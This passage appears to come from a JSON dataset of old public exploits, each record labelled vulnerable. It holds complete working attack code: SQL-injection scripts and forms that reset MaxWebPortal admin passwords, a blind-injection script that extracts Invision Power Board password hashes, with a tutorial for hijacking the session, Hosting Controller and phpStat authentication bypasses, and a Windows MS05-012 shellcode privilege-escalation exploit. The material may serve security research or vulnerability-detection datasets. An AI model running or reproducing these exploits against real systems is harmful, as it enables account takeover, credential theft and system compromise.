=~\"2\" ){$hell = \"foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272\"};\n\n\n\n\n\nmy $host = $ARGV[0];\n\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host,\n\nPeerPort => \"80\" );\n\n\n\nunless ($remote) { die \"C4nn0t C0nn3ct to $host\" }\n\n\n\nprint \"C0nn3cted\\n\";\n\n\n\n$http = \"POST /password.asp?mode=reset HTTP/1.0\";\n\n$http .= \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\\n\";\n\n$http .= \"Accept-Language: fa\\n\";\n\n$http .= \"Content-Type: application/x-www-form-urlencoded\\n\";\n\n$http .= \"Pragma: no-cache\\n\";\n\n$http .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\\n\";\n\n$http .= \"Host: $host\\n\";\n\n$http .= \"Content-Length: 111\\n\";\n\n$http .= \"Proxy-Connection: Keep-Alive\\n\";\n\n$http .= \"Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\\n\\n\";\n\n\n\n$http .= \"pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\\n\\n\\n\\n\";\n\n\n\nprint \"\\n\";\n\nprint $remote $http;\n\nsleep(1);\n\nprint \"[+] Attacking ...\\n\";\n\nprint \"[+] Changing Admin's Password ...\\n\";\n\nwhile (<$remote>)\n\n{\n\n}\n\nprint \"\\nNow Go to $host and Login With :\\n\\n\";\n\nprint \"User: admin\\n\";\n\nprint \"Pass: trapset\\n\\n\";\n\nprint \"Enjoy ;)\\n\";\n\nprint \"\\n\";\n\n### EOF ###\n\n\n\n# milw0rm.com [2005-05-26]",
70        "vulnerable": true
71    },
72    {
73        "exploit_id": 1011,
74        "content": "<?php\n\n/*\n\n------Trap-Set Underground Hacking Team-----------------mh_p0rtal---------------------- \n\nGreetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams : \n\nAlphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam \n\n, CrouZ Security Team , Simorgh-ev Security Team \n\n----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------\n\n*/ \n\n# Config ________________________________   \n\n# address - example: http://www.site.com/password.asp\n\n$url  = \"http://www.mohamad.com/password.asp\";  \n\n$mh = \"s1\";   \n\n# if webmaxportal version is : Version 1.35 and older please input $mh= \"s1\" \n\n# if webmaxportal version is : Version 1.36 , 2.0 please input $mh= \"s2\" \n\n# EnD ___________________________________\n\nif ( $mh == \"s1\" ) {\n\nprint \"<form action=\\\"$url?mode=reset\\\" method=\\\"post\\\"> <br> \";\n\nprint \"Password1 : <input name=\\\"pass\\\" type=\\\"text\\\" value=\\\"abc123\\\" size=\\\"50\\\"><br>\";\n\nprint \"Confirm Pass: <input name=\\\"pass2\\\" type=\\\"text\\\" value=\\\"abc123\\\" size=\\\"50\\\"><br>\"; \n\nprint \" ID  :&nbsp&nbsp&nbsp <input name=\\\"memId\\\" type=\\\"text\\\" value=\\\"-1\\\" size=\\\"50\\\"><br>\"; \n\nprint \"Member key: <input name=\\\"memKey\\\" type=\\\"text\\\" value=\\\"foo' or M_Name='admin\\\" size=\\\"50\\\"><br>\";\n\nprint \"<input name=\\\"Submit\\\" type=\\\"submit\\\" value=\\\":::Change Pass:::\\\">\";\n\nprint \"</form>\";\n\n} if ( $mh == \"s2\" ) {\n\nprint \"<form action=\\\"$url?mode=reset\\\" method=\\\"post\\\"> <br> \";\n\nprint \"Password1: <input name=\\\"pass\\\" type=\\\"text\\\" value=\\\"abc123\\\" size=\\\"50\\\"><br>\"; \n\nprint \"Confirm Pass : <input name=\\\"pass2\\\" type=\\\"text\\\" value=\\\"abc123\\\" size=\\\"50\\\"><br> \";\n\nprint \"ID  :  &nbsp&nbsp&nbsp<input name=\\\"memId\\\" type=\\\"text\\\" value=\\\"-1\\\" size=\\\"50\\\"><br> \";\n\nprint \"Member key: <input name=\\\"memKey\\\" type=\\\"text\\\" value=\\\"foo') or M_Name='admi n' or ('1'='2\\\" size=\\\"50\\\"> <br>\"; \n\nprint \"<input name=\\\"Submit\\\" type=\\\"submit\\\" value=\\\":::Change Pass:::\\\">\";\n\nprint \"</form>\";\n\n} \n\n?>\n\n\n\n# milw0rm.com [2005-05-26]",
75        "vulnerable": true
76    },
77    {
78        "exploit_id": 1012,
79        "content": "<!--\n\nHi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection\n\nin Maxwebportal version 1.35,1.36,2.0, 20050418 Next\n\nRemote user can inject his/her code in \"memKey\" var. and change other users password in\n\npassword.asp\n\n\n\nExploit codes to proof: \n\n-->\n\n\n\n-----------------Code Start-----Version 1.35 and older--------------\n\n<form action=\"http://[URL]/password.asp?mode=reset\" method=\"post\">\n\n<br>\n\npass1: <input name=\"pass\" type=\"text\" value=\"123456\" size=\"150\"><br>\n\npass2: <input name=\"pass2\" type=\"text\" value=\"123456\" size=\"150\"><br>\n\nId: <input name=\"memId\" type=\"text\" value=\"-1\" size=\"150\"><br>\n\nMember Key: <input name=\"memKey\" type=\"text\" value=\"foo' or M_Name='admin\" size=\"150\">\n\n<br>\n\n<input name=\"Submit\" type=\"submit\" value=\"Submit\">\n\n</form>\n\n-----------------End-------------------\n\n\n\nVersion 1.36, 2.0, 20050418 Next:\n\n\n\n-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------\n\n<form action=\"http://[URL]/password.asp?mode=reset\" method=\"post\">\n\n<br>\n\npass1: <input name=\"pass\" type=\"text\" value=\"123456\" size=\"150\"><br>\n\npass2: <input name=\"pass2\" type=\"text\" value=\"123456\" size=\"150\"><br>\n\nId: <input name=\"memId\" type=\"text\" value=\"-1\" size=\"150\"><br>\n\nMember Key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name='admin' or ('1'='2\"\n\n\n\nsize=\"150\">\n\n<br>\n\n<input name=\"Submit\" type=\"submit\" value=\"Submit\">\n\n</form>\n\n-----------------End-------------------\n\n\n\n# milw0rm.com [2005-05-26]",
80        "vulnerable": true
81    },
82    {
83        "exploit_id": 1013,
84        "content": "#!/usr/bin/perl -w\n\n##################################################################\n\n# This one actually works :) Just paste the outputted cookie into\n\n# your request header using livehttpheaders or something and you\n\n# will probably be logged in as that user. No need to decrypt it!\n\n# Exploit coded by \"Tony Little Lately\" and \"Petey Beege\"\n\n##################################################################\n\n\n\nuse LWP::UserAgent;\n\n\n\n   $ua = new LWP::UserAgent;\n\n   $ua->agent(\"Mosiac 1.0\" . $ua->agent);\n\n\n\nif (!$ARGV[0]) {$ARGV[0] = '';}\n\nif (!$ARGV[3]) {$ARGV[3] = '';}\n\n\n\nmy $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';\n\nmy $user = $ARGV[1];   # userid to jack\n\nmy $iver = $ARGV[2];   # version 1 or 2\n\nmy $cpre = $ARGV[3];   # cookie prefix\n\nmy $dbug = $ARGV[4];   # debug?\n\n\n\nif (!$ARGV[2])\n\n{\n\n        print \"The type of the file system is NTFS.\\n\\n\";\n\n        print \"WARNING, ALL DATA ON NON-REMOVABLE DISK\\n\";\n\n        print \"DRIVE C: WILL BE LOST!\\n\";\n\n        print \"Proceed with Format (Y/N)?\\n\";\n\n        exit;\n\n}\n\n\n\nmy @charset = (\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"a\",\"b\",\"c\",\"d\",\"e\",\"f\");\n\n\n\nmy $outputs = '';\n\n\n\nfor( $i=1; $i < 33; $i++ )\n\n{\n\n        for( $j=0; $j < 16; $j++ )\n\n        {\n\n                my $current = $charset[$j];\n\n            my $sql = ( $iver < 2 ) ?  \"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*\" :\n\n\"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*\";\n\n                my @cookie = ('Cookie' => $cpre . \"member_id=31337420; \" . $cpre . \"pass_hash=\" . $sql);\n\n                my $res = $ua->get($path, @cookie);\n\n\n\n                # If we get a valid sql request then this\n\n                # does not appear anywhere in the sources\n\n                $pattern = '<title>(.*)Log In(.*)</title>';\n\n\n\n                $_ = $res->content;\n\n\n\n                if ($dbug) { print };\n\n\n\n                if ( !(/$pattern/) )\n\n                {\n\n                        $outputs .= $current;\n\n                        print \"$current\\n\";\n\n                    last;\n\n                }\n\n\n\n        }\n\n  if ( length($outputs) < 1 )   { print \"Not Exploitable!\\n\"; exit;     }\n\n}\n\nprint \"Cookie: \" . $cpre . \"member_id=\" . $user . \";\" . $cpre . \"pass_hash=\" . $outputs;\n\nexit;\n\n\n\n# milw0rm.com [2005-05-26]",
85        "vulnerable": true
86    },
87    {
88        "exploit_id": 1014,
89        "content": "# danica jones <danica6699@gmail.com>\n\n\n\nTutorial for the recent exploit released by Petey Beege.\n\n\n\n1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)\n\n2. Make sure you have LWP::UserAgent perl module if not do this:\n\n     a. perl -MCPAN -e 'shell'\n\n     b. inside the perl shell, do this 'install LWP::UserAgent'\n\n3. Run the exploit. Get the password hash for the desired login id\n\n\n\nex. inv.pl http://forums.example.com 2 2\n\n\n\nWhere 2 is the login id and 2 for version 2 of IPB.\n\n\n\n4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at\n\n\n\nC:\\Documents and Settings\\the1\\Application Data\\Mozilla\\Firefox\\Profiles\\vspyhjb9.default\\cookies.txt\"\n\n\n\nAdd the following entries:\n\n\n\nforums.example.com        FALSE        /        FALSE\t\t1148708747\t  member_id        1\n\nforums.example.com        FALSE        /        FALSE\t\t1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c\n\n\n\nNotice the value of member_id and pass_hash taken from the values\n\ngenerated by the exploit.\n\n\n\n5. Fire up Mozilla Firefox and login to http://forums.example.com\n\n\n\nEnjoy!\n\n\n\n\n\n# milw0rm.com [2005-05-27]",
90        "vulnerable": true
91    },
92    {
93        "exploit_id": 1015,
94        "content": "<!--\n\n\n\nHi, I'm Soroush Dalili from GSG (GrayHatz Security Group).\n\n\n\nTitle: Hosting controller program have a security bug\n\nin \"UserProfile.asp\" that an authenticated user can\n\nchange other's profiles.\n\nWhy is it dangerous: a user can change other's email\n\naddress and then use forgot password to recieve their\n\npassword! also he/she can gain administrator password\n\nby this way!\n\nVersion: 6.1 HotFix 2.0 and older\n\nDeveloper url: hostingcontroller.com\n\nComment: Hosting Controller is an application to\n\nmanage a host.\n\n\n\nExploit code to proof:\n\n--------------------------------\n\nChange users profiles: --> \n\n\n\n\n\n\n\n<form action=\"http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile\" method=\"post\">\n\nUsername : <input name=\"UserList\" value=\"hcadmin\" type=\"text\" size=\"50\">\n\n<br>\n\nemailaddress : <input name=\"emailaddress\" value=\"Crkchat@msn.com\" type=\"text\" size=\"50\">\n\n<br>\n\nfirstname : <input name=\"firstname\" value=\"Crkchat\" type=\"text\" size=\"50\">\n\n<br>\n\n<input name=\"submit\" value=\"submit\" type=\"submit\">\n\n</form>\n\n\n\n<!--\n\n-----------------------------------\n\nNow u can use forgot password to gain passwords! -->\n\n\n\n# milw0rm.com [2005-05-27]",
95        "vulnerable": true
96    },
97    {
98        "exploit_id": 1016,
99        "content": "#!/usr/bin/perl\n\n#####################################################################\n\n#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m\n\n#####################################################################\n\n# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability\n\n#\n\n#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )\n\n#E-Mail : Alpha_Programmer@Yahoo.com\n\n#\n\n#This Xpl Change Admin's Pass in This Portal !!\n\n#Discovered by: SoulBlack\n\n#\n\n#Vulnerable Version : phpStat 1.5\n\n#\n\n#####################################################################\n\n# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com\n\n#\n\n# So Iranian Hacking & Security Teams :\n\n#\n\n# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT\n\n#####################################################################\n\n\n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 3)\n\n{\n\n print \"\\n==========================================\\n\";\n\n print \" \\n     -- Exploit By Alpha Programmer --\\n\\n\";\n\n print \"     Trap-Set UnderGrounD Hacking Team      \\n\\n\";\n\n print \"         Usage: <T4rg3t> <DIR> <Password>\\n\\n\";\n\n print \"==========================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \"    phpStat.pl www.Site.com /phpstat/ 12345\\n\";\n\n exit();\n\n}\n\n\n\nmy $host = $ARGV[0];\n\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host,\n\nPeerPort => \"80\" );\n\n\n\nunless ($remote) { die \"C4nn0t C0nn3ct to $host\" }\n\n\n\nprint \"C0nn3cted\\n\";\n\n\n\n$http = \"GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\\n\";\n\n$http .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\\n\";\n\n$http .= \"Host: $host\\n\\n\\n\\n\";\n\n\n\nprint \"[+]Sending H3ll Packet ...\\n\";\n\nprint $remote $http;\n\nsleep(1);\n\nprint \"[+]Wait For Authentication Bypass ...\\n\";\n\nsleep(100);\n\nwhile (<$remote>)\n\n{\n\n}\n\nprint \"[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\\n\\n\";\n\nprint \"[+]User: admin\\n\";\n\nprint \"[+]Pass: $ARGV[2]\";\n\n\n\n# milw0rm.com [2005-05-30]",
100        "vulnerable": true
101    },
102    {
103        "exploit_id": 1017,
104        "content": "<?php\n\nerror_reporting(E_PARSE);\n\n/*\n\n================================================================\n\nPHP Stat Administrative User Authentication Bypass POC Exploit\n\n================================================================\n\n====Trap-Set Underground Hacking Team===========mh_p0rtal============\n\n\n\nGreetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :\n\nAlphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam\n\n, CrouZ Security Team , Simorgh-ev Security Team ,\n\n\n\n====================^^^^^^^^^^^^^^^^^^^-=========================\n\n*/\n\n# Config ________________________________\n\n# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php\n\n\n\n$url = \"http://www.site.com/setup.php\";\n\n\n\n# EnD ___________________________________\n\n\n\nprint \"<form action=\\\"$url?check=yes&username=$username&password=$password\\\" >\";\n\nprint \"<input type=\\\"hidden\\\" name=\\\"check\\\"  value=\\\"yes\\\">\";\n\nprint \"Username : <input type=\\\"text\\\" name=\\\"username\\\"  value=\\\"admin\\\" size=\\\"25\\\"><br>\";\n\nprint \"Password : <input type=\\\"text\\\" name=\\\"password\\\"  value=\\\"abc123\\\" size=\\\"25\\\"><br>\";\n\nprint (\"<input type=submit value=::Change. > \\n\");\n\nprint \"</form>\";\n\n\n\n//------------------------------------------------------End.\n\n?>\n\n\n\n# milw0rm.com [2005-05-30]",
105        "vulnerable": true
106    },
107    {
108        "exploit_id": 1018,
109        "content": "<?\n\n\n\n/*\n\n\n\n**************************************************************\n\nPHP Stat Administrative User Authentication Bypass POC Exploit\n\n     Code by Nikyt0x - Soulblack Security Research\n\n**************************************************************\n\n\n\nAdvisory: \n\n http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt\n\n\n\nSaludos:                                        \n\n   Soulblack Staff, Status-x, NeosecurityTeam,\n\n   KingMetal, SWP, Trespasser...\n\n\n\nnikyt0x@gmail.com\n\nhttp://www.nikyt0x.tk\n\n\n\n**************************************************************\n\n**This Exploit Change Admin Username and Password\n\n**Username: admin\n\n**Password: admin\n\n**************************************************************\n\n\n\n\n\nphp sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php\n\n\n\n          ==============================================================\n\n          PHP Stat Administrative User Authentication Bypass POC Exploit\n\n          ==============================================================\n\n                     by Nikyt0x - Soulblack Security Research\n\n\n\n     [+] Testing: www.spazfarm.com\n\n     [+] Socket\n\n     [+] Sending Exploit\n\n     [+] OK\n\n\n\n     Open www.spazfarm.com/spazstats/setup.php\n\n\n\n     Username: admin\n\n     Password: 123456\n\n\n\n**************************************************************\n\n*/\n\n\n\n// username and password\n\n\n\n$username = \"admin\";\n\n$password = \"123456\";\n\n\n\nfunction sh0w()\n\n{\n\necho \"\\n          ==============================================================\\n\";\n\necho \"          PHP Stat Administrative User Authentication Bypass POC Exploit\\n\";\n\necho \"          ==============================================================\\n\";\n\necho \"                     by Nikyt0x - Soulblack Security Research\\n\\n\";\n\n}\n\n\n\nif ($argc != 3)\n\n{\n\nsh0w();\n\necho \"\\n\\n          Usage:\\n                   sbphpstatpoc.php www.site.com /dir/to/setup.php\\n\";\n\nexit();\n\n}\n\n\n\n\n\nif(!ereg('setup.php',$argv[2])) {\n\n   echo \"URL to setup.php Incorrect.\\n\";\n\n   exit(0);\n\n}\n\n\n\nsh0w();\n\n\n\necho \"     [+] Testing: $argv[1]\\n\";\n\n\n\n$s0ck3t = fsockopen($argv[1], 80);\n\n\n\nif (!$s0ck3t) {\n\n   echo \"     [-] Socket\\n\";\n\n   exit(0);\n\n} else {\n\n\n\n    $petici0n  = \"GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\\r\\n\";\n\n    $petici0n .= \"Host: $argv[1]\\r\\n\";\n\n    $petici0n .= \"Connection: Close\\r\\n\\r\\n\";\n\n   \n\n   echo \"     [+] Socket\\n\";\n\n\n\nif(!fwrite($s0ck3t, $petici0n))\n\n   {\n\n   echo \"     [-] Sending Exploit\\n\";\n\n   exit(0);\n\n   }\n\necho \"     [+] Sending Exploit\\n\";\n\n\n\n while (!feof($s0ck3t)) {\n\n       $g3tdata = fgets($s0ck3t, 1024);\n\n\t   if (eregi('Setup has been updated',$g3tdata))\n\n\t   {\n\n\t   echo \"     [+] OK\\n\\n\";\n\n           echo \"     Open $argv[1]$argv[2]\\n\\n     Username: $username\\n     Password: $password\\n\";\n\n           exit();\n\n           }\n\n\n\n}\n\nfclose($s0ck3t);\n\n}\n\n\n\n?>\n\n\n\n# milw0rm.com [2005-05-30]",
110        "vulnerable": true
111    },
112    {
113        "exploit_id": 1019,
114        "content": "// by Cesar Cerrudo - Argeniss - www.argeniss.com\n\n// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit\n\n//\n\n// More exploits at www.argeniss.com/products.html\n\n//\n\n// Works on Win2k sp4, WinXP sp2, Win2k3 sp0\n\n// Close all runing programs to avoid possible problems\n\n// If it finds the section and it doesn't work remove section permissions \n\n// from msiexec service process with WinObj or crash the msiexec service and try again \n\n// if offsets don't work, debug and change them\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\ntypedef struct _LSA_UNICODE_STRING {  \n\n\tUSHORT Length;  \n\n\tUSHORT MaximumLength; \n\n\tPWSTR Buffer;\n\n} UNICODE_STRING;\n\n\n\ntypedef struct _OBJDIR_INFORMATION {\n\n  UNICODE_STRING          ObjectName;\n\n  UNICODE_STRING          ObjectTypeName;\n\n  BYTE                    Data[1];\n\n} OBJDIR_INFORMATION;\n\n\n\ntypedef struct _OBJECT_ATTRIBUTES {\n\n    ULONG Length;\n\n    HANDLE RootDirectory;\n\n    UNICODE_STRING *ObjectName;\n\n    ULONG Attributes;\n\n    PVOID SecurityDescriptor;        \n\n    PVOID SecurityQualityOfService;  \n\n} OBJECT_ATTRIBUTES;\n\n\n\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\n\n    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \\\n\n    (p)->RootDirectory = r;                             \\\n\n    (p)->Attributes = a;                                \\\n\n    (p)->ObjectName = n;                                \\\n\n    (p)->SecurityDescriptor = s;                        \\\n\n    (p)->SecurityQualityOfService = NULL;               \\\n\n    }\n\n\n\ntypedef DWORD (WINAPI* MSIINSTALLPRODUCT)(LPCSTR szPackagePath, LPCSTR szCommandLine);\n\nMSIINSTALLPRODUCT MsiInstallProduct;\n\n\n\ntypedef DWORD (WINAPI* NTQUERYDIRECTORYOBJECT)( HANDLE, OBJDIR_INFORMATION*, DWORD, DWORD ,DWORD,DWORD*,DWORD* );\n\nNTQUERYDIRECTORYOBJECT NtQueryDirectoryObject;\n\n\n\ntypedef DWORD (WINAPI* NTOPENDIRECTORYOBJECT)( HANDLE *, DWORD,OBJECT_ATTRIBUTES* );\n\nNTOPENDIRECTORYOBJECT  NtOpenDirectoryObject;\n\n\n\n\n\nDWORD WINAPI  LoadWinInstaller(LPVOID lpParam) \n\n{ \n\n\tHMODULE hMsi;\n\n\n\n\thMsi = LoadLibrary(\"msi.dll\"); \n\n\tMsiInstallProduct = (MSIINSTALLPRODUCT)GetProcAddress(hMsi, \"MsiInstallProductA\");\n\n  //run unistall , without permissions this makes a windows pop up\n\n  //while this window is showing the shared section is created and available on Windows Installer service process\n\n\tMsiInstallProduct((char*)lpParam,\"REMOVE=ALL\");\n\n  \n\n\treturn 0; \n\n} \n\n\n\n\n\n\n\nint main(int argc, char* argv[])\n\n{\n\n\n\n  OBJDIR_INFORMATION *ssinfo  =(OBJDIR_INFORMATION* ) HeapAlloc(GetProcessHeap(), 0, 0x800);\n\n\n\n  HANDLE hFile,hThread,hMapFile; \n\n  HMODULE hNtdll ,hKernel;\n\n  DWORD dwThreadId; \n\n  OBJECT_ATTRIBUTES obj;\n\n  WCHAR  * uString=L\"\\\\BaseNamedObjects\";\n\n  UNICODE_STRING str;\n\n  DWORD i,a,iStrLen,b=0;\n\n  char sObjName[30],sTmp[50];\n\n  LPVOID lpMapAddress;\n\n  FARPROC pWinExec,pExitThread;\n\n  bool bFound;\n\n  char* sCommand;\n\n\n\n\n\n  if (!argv[1]||!argv[2]) {\n\n\tprintf(\"\\nUsage :\\n\tSSExploit \\\"Applicatoin to uninstall\\\" \\\"command\\\" \\n\");\n\n\tprintf(\"\\nExamples :\\n  SSExploit \\\"c:\\\\windows\\\\system32\\\\webfldrs.msi\\\" \\\"cmd.exe\\\" (cmd.exe will interactively run on Win2k only) \\n  SSExploit \\\"c:\\\\windows\\\\system32\\\\webfldrs.msi\\\" \\\"net localgroup administrators /add youruser\\\" \\n\");\n\n\texit(0);\n\n  }\n\n    \n\n  iStrLen=strlen(argv[2]);\n\n\n\n  if(iStrLen>=65){\n\n\tprintf(\"\\n\\\"command\\\" must be less than 65 chars.\\n\");\n\n\texit(0);\n\n  }\n\n\n\n  sCommand=argv[2];\n\n\n\n  hThread = CreateThread(NULL,0,LoadWinInstaller,argv[1],0,&dwThreadId); \n\n\n\n  Sleep(3000);\n\n\n\n  hNtdll = LoadLibrary(\"ntdll.dll\");    \n\n\n\n  NtQueryDirectoryObject = (NTQUERYDIRECTORYOBJECT )GetProcAddress(hNtdll,\"NtQueryDirectoryObject\");\n\n  NtOpenDirectoryObject = (NTOPENDIRECTORYOBJECT )GetProcAddress(hNtdll,\"NtOpenDirectoryObject\");\n\n  \n\n  str.Length=wcslen(uString)*2;\n\n  str.MaximumLength =wcslen(uString)*2+2;\n\n  str.Buffer =uString;\n\n\n\n  InitializeObjectAttributes (&obj, &str, 0, 0, 00);\n\n  NtOpenDirectoryObject(&hFile,0x20001,&obj);\n\n\n\n  printf(\"\\nSearching for Shared Section...\\n\\n\"); \n\n\n\n  // Get all objects names under \\BaseNamedObjects\n\n\n\n  if (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,TRUE,&b,&a)==0){\n\n\tdo{ \n\n\t\tbFound=NULL;\n\n\t\twhile (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,FALSE,&b,&a)==0){\n\n\t\t  //check if it's a section name\t\n\n\t\t\tif (!wcscmp(ssinfo->ObjectTypeName.Buffer ,L\"Section\")){             \n\n\t\t\t\tfor (i=0;(i<=wcslen(ssinfo->ObjectName.Buffer))&(i<30);i++){\n\n\t\t\t\t\tsObjName[i]=(char)ssinfo->ObjectName.Buffer[i];\n\n\t\t\t\t}\n\n\t\t      //check if it's the one we are searching for\n\n\t\t\t\tif (!strncmp(sObjName,\"DfSharedHeap\",12)){      \n\n\t\t\t\t\tbFound=1;\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n\t\tif (bFound)\n\n\t\t\tprintf(\"Shared Section Found: %s\\n\",sObjName);\n\n\t\telse {\n\n\t\t\tprintf(\"Shared Section Not Found\");\n\n\t\t\texit(0);\n\n\t\t}\n\n    \n\n\t\tstrcpy(sTmp,\"Global\\\\\");\n\n\t\tstrcat(sTmp,sObjName);    //append global prefix to support Terminal Services\t\n\n\n\n\t\thMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,sTmp); \n\n\t\n\n      //the shared section name couldn't be the one we are searching for\n\n\t\tif (hMapFile == NULL) \n\n\t\t\tprintf(\"Could not open Shared Section\\n\\n\"); \n\n\t\telse\n\n\t\t\tprintf(\"Shared Section opened\\n\\n\"); \n\n\t\n\n\t} while (hMapFile == NULL) ;\n\n\n\n\tlpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);\n\n \n\n\tif (lpMapAddress == NULL) { \n\n\t\tprintf(\"Could not map Shared Section\"); \n\n\t\texit(0);\n\n\t}\n\n\telse \n\n\t\tprintf(\"Shared Section Mapped\\n\\nOverwriting Pointer and Inyecting Shellcode...\\n\\n\"); \n\n\n\n\thKernel=LoadLibrary(\"Kernel32.dll\");\n\n\t\n\n\tpWinExec=GetProcAddress(hKernel,\"WinExec\");\n\n\tpExitThread=GetProcAddress(hKernel,\"ExitThread\");\n\n\n\n\t_asm{\n\n\t\t\t\n\n\t\tmov eax,fs:[30h]   // get pointer to PEB \n\n\t\tmov eax,[eax+0A8h] // get OS minor version\n\n\t\tcmp eax,0x0\n\n\t\tjz W2ksp4\n\n\t\tcmp eax,0x1        \n\n\t\tjz WinXPsp2\n\n\t\tjmp Win2K3   // address of section seems static on same OS version\n\n\t\t\t\t\t\n\n\tW2Ksp4:\n\n\t\tmov eax,0x0101FFF0 // address of begining of section - 0x10 used to overwrite pointer\n\n\t\tmov edx,0x01020004 // address of shellcode\n\n\t\tjmp Done\n\n\t\n\n\tWinXPsp2:\n\n\t\tmov eax,0x0086FFF0 // address of begining of section - 0x10 used to overwrite pointer\n\n\t\tmov edx,0x00870004 // address of shellcode\n\n\t\tjmp Done\n\n\t\n\n\tWin2K3:\n\n\t\tmov eax,0x007BFFF0 // address of begining of section - 0x10 used to overwrite pointer\n\n\t\tmov edx,0x007C0004 // address of shellcode\n\n\n\n\tDone:\n\n\t\tmov ebx,lpMapAddress\n\n\t\tmov ecx, 0x1000\n\n\n\n\tl00p:                  // overwrite section data, so overwriten structures will point to shellcode\n\n\t\tmov dword ptr[ebx],eax \n\n\t\tsub ecx,0x4\n\n\t\tadd ebx,0x4\n\n\n\n\t\tcmp ecx,0x0\n\n\t\tjnz l00p\n\n\n\n\t\tmov ebx,lpMapAddress  //address of shellcode\n\n\t\tmov dword ptr[ebx],edx                    \n\n\t\t\n\n\t//start copying shellcode\n\n    \n\n\t\tlea esi, Shellcode\n\n\t\tlea edi, [ebx+4]\n\n\t\tlea ecx, End\n\n\t\tsub ecx, esi\n\n\t\tpush esi\n\n\t\tpush edi\n\n\t\tcld\n\n\t\trep movsb\n\n\n\n\t\tpop edi\n\n\t\tpop esi\n\n\t\tpush edi\n\n\t\tlea ecx, CommandBuf\n\n\t\tsub ecx, esi\n\n\t\tadd edi, ecx\n\n\t\tmov esi, sCommand\n\n\t\tmov ecx, iStrLen\n\n\t\trep movsb\n\n\t\tmov [edi], 0x00\n\n\n\n\t\tpop edi\n\n\t\tmov esi, pWinExec\n\n\t\tmov [edi+0x5], esi\n\n\n\n\t\tmov esi, pExitThread\n\n\t\tmov [edi+0x9], esi\n\n\n\n\t}\n\n\n\n\tprintf(\"Command should have been executed ;)\\n\"); \n\n\tCloseHandle(hMapFile);\n\n\n\n  }\n\n  else printf(\"Couldn't get object names \\n\");\t\n\n\n\n  return 0;\n\n\n\n\t_asm{\n\n\n\n\tShellcode:\n\n\t\tcall getDelta\n\n\t\t\t\t// this gets overwrited\n\n\t\tmov ax,0xffff\t\n\n\t\tmov ax,0xffff\t\n\n\n\n\tCommandBuf:\t\t\t\t\t// this gets overwrited\n\n\t\tmov dword ptr[eax],0x55555555\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\t\tmov dword ptr[eax],0x55555555\t\n\n\n\n\tgetDelta:\n\n\t\tpop edx\t\t\t\t\t\t\t// Get shellcode/shared section pointer\n\n\t\tpush edx\t\t\t\t\t\t// save edx\n\n\n\n\t\tpush 0x1\t\t\t\t\t\t// push 0x0 for hidden window\n\n\t\tlea eax, [edx+0x8]\t\t\t\t\t\n\n\t\tpush eax\t\t\t\t\t\t// Command offset\n\n\t\tcall [edx]\t\t\t\t\t\t// Call WinExec\n\n       \n\n\t\tpop edx\n\n\t\tcall [edx+0x4]\t\t\t\t\t// Call ExitThread to avoid msiexec service to 